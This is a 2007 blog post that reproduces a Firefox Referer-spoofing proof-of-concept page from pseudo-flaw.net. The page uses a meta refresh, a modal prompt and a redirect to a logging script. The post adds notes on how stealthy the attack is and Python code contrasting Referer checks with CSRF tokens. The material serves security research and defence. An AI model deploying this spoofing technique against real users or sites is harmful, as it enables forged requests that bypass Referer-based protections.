Referer Spoofing Using JavaScript

by comment

Just read an interesting article on the awesome pseudo-flaw.net that you might enjoy. Even though at the moment I'm more into AJAX and simple behavioural unobtrusive JavaScript as opposed to Java, I still remember how excited I was back in 1995 when Sun released both beta and alpha Java versions to the public. In fact I still have my Java 1.0 Unleashed book, which I'm looking at right now.

JavaScript is such a fun language to play with and experiment with; I just don't see the value in hacking JavaScript to do blackhat stuff. I really don't see the value in doing any blackhat stuff, for the simple reason that it's not worth the risk. I really admire the hackers who freely give their time, energy, and expertise to improve the security of free software such as Mozilla Firefox. It's fun to see what other people are discovering. Check it.

pseudo-flaw.net


Proof Of Exploit Code

<html>
  <head><meta http-equiv="Refresh" content="1;url=http://www.askapache.com/">
  </head>
  <body>
    <script defer="1">
      setTimeout(function() {
        // from The Jungle Book, by Rudyard Kipling
        var text = "";
        text += "At the hole where he went in\n";
        text += "Red-Eye called to Wrinkle-Skin.\n";
        text += "Hear what little Red-Eye saith:\n";
        text += "\"Nag, come up and dance with death!\"\n";
        text += "\n";
        text += "Eye to eye and head to head,\n";
        text += "   (Keep the measure, Nag.)\n";
        text += "This shall end when one is dead;\n";
        text += "   (At thy pleasure, Nag.)\n";
        text += "Turn for turn and twist for twist-\n";
        text += "   (Run and hide thee, Nag.)\n";
        text += "Hah!  The hooded Death has missed!\n";
        text += "   (Woe betide thee, Nag!)\n";
        // modal dialog: the statements below run only after the user dismisses it,
        // i.e. after the 1-second meta refresh above has already become due
        prompt(text);
        var t = new Image();  // JavaScript is case-sensitive; "new image()" would throw
        t.src = 'http://topsites.blogflux.com/track_96716..gif';
        // navigate to the logging CGI, which records the Referer the browser sends
        location = "http://pseudo-flaw.net/firefox-referer-spoofing/log-request-info.cgi?title=Request+Info:+Quickly";
      }, 900);
    </script>
  </body>
</html>

Notes

  • Only the GET request method seems to be affected. There does not appear to be any mechanism to submit POST data.
  • If the user's browser is configured to not submit Referer information (e.g., network.http.sendRefererHeader=0), these attacks obviously do nothing.
  • The attack will fail if the user forcibly kills the browser, turns off her machine or severs her Internet connection before dismissing the dialog box.
  • The examples use a dynamically generated iframe for demonstration purposes. These attacks work equally well for static pages or top-level content (e.g., sample using meta refresh [source]). Unfortunately, it is not as stealthy.
  • The meta refresh approach is most desirable, because the initial request is submitted without any referer information making the attack more difficult to detect.
  • These examples use intentionally goofy text. A real attack would use more appropriate text.
  • Invoking the "Joke Method" twice in a row crashes MineField/3.0a9pre.
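The practical point of the notes above is that the Referer header is under the browser's, and so the attacker's, influence, so a server-side check that trusts it on a GET request is weak. The following Python is an added example, not code from the original post or from pseudo-flaw.net; the host name, session id and endpoint are constructed, and it contrasts a Referer-only check with a session-bound CSRF token check on the same pair of requests.

```python
# Constructed example (not from the original post): a Referer allowlist
# versus a session-bound CSRF token on a state-changing GET endpoint.
import hmac
import secrets
from urllib.parse import urlparse, parse_qs

TRUSTED_HOST = "www.example.org"   # hypothetical site being protected
SESSION_TOKENS = {}                # session id -> CSRF token

def issue_token(session_id):
    """Mint a random token bound to the session when the page is rendered."""
    token = secrets.token_urlsafe(32)
    SESSION_TOKENS[session_id] = token
    return token

def referer_only_check(request):
    """Weak: trusts any Referer whose host is ours; the demo shows it can lie."""
    return urlparse(request["headers"].get("Referer", "")).hostname == TRUSTED_HOST

def token_check(request):
    """Hardened: the csrf query value must equal the token bound to the cookie session."""
    expected = SESSION_TOKENS.get(request["cookies"].get("sid"))
    supplied = parse_qs(urlparse(request["url"]).query).get("csrf", [""])[0]
    return expected is not None and hmac.compare_digest(supplied, expected)

def build_requests():
    """Two constructed GETs carrying the victim's cookie and a trusted-looking Referer."""
    token = issue_token("victim-session")
    common = {"headers": {"Referer": f"https://{TRUSTED_HOST}/account"},
              "cookies": {"sid": "victim-session"}}
    legit = dict(common, url=f"https://{TRUSTED_HOST}/account/delete?csrf={token}")
    # The forged request carries the spoofed Referer but cannot include a token
    # the attacker never saw (the token is only ever sent to the trusted origin).
    forged = dict(common, url=f"https://{TRUSTED_HOST}/account/delete")
    return legit, forged

def evaluate():
    """Returns (legit_accepted, forged_accepted) for each check."""
    legit, forged = build_requests()
    return {"referer_only": (referer_only_check(legit), referer_only_check(forged)),
            "token": (token_check(legit), token_check(forged))}

if __name__ == "__main__":
    print(evaluate())  # {'referer_only': (True, True), 'token': (True, False)}
```

The Referer-only check accepts the forgery, while the token check rejects it without needing to trust any header the browser can be tricked into sending.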

November 27th, 2007
